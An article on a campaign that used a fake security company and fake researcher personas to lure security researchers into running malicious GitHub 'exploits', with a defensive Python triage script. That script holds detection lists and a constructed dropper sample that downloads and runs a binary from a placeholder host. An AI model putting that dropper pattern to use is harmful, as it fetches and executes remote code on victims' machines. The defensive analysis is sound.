
How Sophisticated Cybercriminals Are Exploiting Synthetic Security Researchers for IP Theft


Malicious GitHub Repository Targets Security Researchers

An Unprecedented Level of Sophistication

In May, a threat group created a malicious GitHub repository that claimed to hold a zero-day exploit for a vulnerability in the Signal messaging app. What sets the campaign apart is how far the attackers went to look credible: they invented a security company, High Sierra Cyber Security, and fabricated profiles for researchers supposedly employed there. Threat intelligence firm VulnCheck, which investigated the incident, says the effort spent on personas and credibility for the fake company is without precedent.

According to William Vu, a security researcher at VulnCheck, the attackers devoted significant time and effort to the façade. They not only advertised the GitHub repositories containing the malware, but also created multiple fake personas for each actor involved. Building out an entire fake security company to this degree is a new development in cyber attacks.

A History of Targeting Security Researchers

While attacks on security researchers are relatively rare, they are not new. In 2021, Google's Threat Analysis Group (TAG) warned of North Korea-backed hackers who set up a fake research blog and multiple fake Twitter profiles to approach researchers. Mandiant has likewise reported North Korean actors targeting security researchers through LinkedIn accounts posing as recruiters.

These campaigns are social engineering aimed at the research supply chain. By manufacturing a trustworthy image, the actors get researchers to clone a repository and run its contents with less scrutiny than they would give code from a stranger. That puts the researcher's own system at risk and, through it, whatever intellectual property that system can reach.

Vulnerabilities Explored via GitHub, WhatsApp, and More

The recent attack targeted researchers by hosting fake exploits on GitHub. After VulnCheck reported the repositories and GitHub took them down, the attackers stood up new ones claiming exploits for other popular platforms, including WhatsApp, Microsoft Exchange, and Discord. Each takedown was followed by a new repository, continuing the cat-and-mouse game.

The researchers found that, instead of an exploit, the Python files in the repositories downloaded a binary specific to the host operating system when executed. Most antivirus engines detected the Windows payload fetched by the script, but only a small number of Linux host-based scanners flagged the Linux binary. The practical lesson is to read and vet the code before running it, and not to rely on endpoint detection alone, particularly on Linux.
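The pattern described above (a "proof of concept" that probes the host OS, fetches a binary, and runs it) can be checked for statically before anything is executed. The following is an added example of such a triage script; it is not VulnCheck's tooling, not the attackers' code, and the two inline samples are constructed to resemble the described behaviour rather than reproduce the real repositories. It parses a Python file with the `ast` module, resolves import aliases, and reports whether the file contains all three ingredients of a dropper: a network download, an operating-system probe, and execution of a file.

```python
"""Static dropper triage for a Python 'exploit' file (added example).

The file under review is parsed, never imported or run. Hits are grouped
into the three ingredients the article describes: download, OS probe,
execute. A file showing all three is flagged as dropper-like.
"""
import ast

# Qualified names that indicate each ingredient. These are the common
# standard-library and requests spellings, not an exhaustive list.
DOWNLOAD = {"urllib.request.urlopen", "urllib.request.urlretrieve",
            "requests.get", "requests.post", "http.client.HTTPSConnection"}
OS_PROBE = {"platform.system", "platform.machine", "sys.platform",
            "os.name", "os.uname"}
EXECUTE = {"os.system", "os.popen", "os.execv", "os.execvp", "os.chmod",
           "os.startfile", "subprocess.run", "subprocess.call",
           "subprocess.Popen", "subprocess.check_output"}


def _import_aliases(tree):
    """Map each local name to the fully qualified name it was imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name        # import x.y as z
                else:
                    root = a.name.split(".")[0]        # import x.y binds x
                    aliases[root] = root
        elif isinstance(node, ast.ImportFrom) and node.module and not node.level:
            for a in node.names:                       # from x.y import f as g
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _qualified(node, aliases):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, '' otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def triage(source):
    """Classify suspicious calls/attributes; return hits and a verdict."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    hits = {"download": set(), "os_probe": set(), "execute": set()}
    for node in ast.walk(tree):
        # A Call's func is also visited as an Attribute; sets dedupe that.
        target = node.func if isinstance(node, ast.Call) else node
        if not isinstance(target, (ast.Attribute, ast.Name)):
            continue
        name = _qualified(target, aliases)
        if name in DOWNLOAD:
            hits["download"].add((node.lineno, name))
        elif name in OS_PROBE:
            hits["os_probe"].add((node.lineno, name))
        elif name in EXECUTE:
            hits["execute"].add((node.lineno, name))
    return {"hits": {k: sorted(v) for k, v in hits.items()},
            "dropper_like": all(hits.values())}


# Constructed sample resembling the dropper pattern; the URL is a
# placeholder, and nothing here is ever executed by this script.
DROPPER_SAMPLE = '''
import platform, subprocess, tempfile, os
from urllib.request import urlopen

def main():
    if platform.system() == "Windows":
        url = "https://example.invalid/payload.exe"
    else:
        url = "https://example.invalid/payload.elf"
    data = urlopen(url).read()
    path = os.path.join(tempfile.gettempdir(), "update")
    with open(path, "wb") as f:
        f.write(data)
    os.chmod(path, 0o755)
    subprocess.run([path])
'''

# Constructed benign proof of concept: builds a packet and prints it.
BENIGN_SAMPLE = '''
import struct, sys

def build(seq):
    return struct.pack(">I", seq) + b"ABCD"

if __name__ == "__main__":
    sys.stdout.write(build(1).hex() + chr(10))
'''

if __name__ == "__main__":
    for label, src in (("dropper", DROPPER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage(src))
```

This only catches the plain spelling of each ingredient. Code that reaches the same functions through `getattr`, `importlib`, or an `exec` of a decoded blob will pass the check, so treat a clean result as "nothing obvious" rather than "safe", and keep the habit of reading the file and running it, if at all, in a disposable VM.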

The Implication for Research Community and Recommendations

The attack's goal was access to researchers' caches of zero-day exploits and their employers' intellectual property. Given how damaging such a breach can be, both companies and individual researchers need to stay alert and take concrete steps to protect themselves online.

Erich Kron, a security awareness advocate, emphasized that running code written by others, especially code from open platforms like GitHub, always carries some level of risk. Researchers should be cautious when examining code and should not assume that suspicious parts are legitimate components of a disclosed zero-day exploit.

Researchers can protect themselves by doing due diligence before engaging with unknown developers or companies: check the track record of the company claiming to do security research and the credentials of the researchers associated with it. A package that appears out of nowhere, or developers with no prior history in the field, should be treated as red flags.

Conclusion

The attack on security researchers using a malicious GitHub repository coupled with the creation of a fake security company demonstrates the increasing sophistication of cyber criminals. It highlights the need for increased awareness and caution among the research community and the importance of robust security measures in the supply chain process. By staying vigilant, conducting thorough vetting processes, and adhering to best security practices, researchers can protect themselves and their valuable intellectual property.

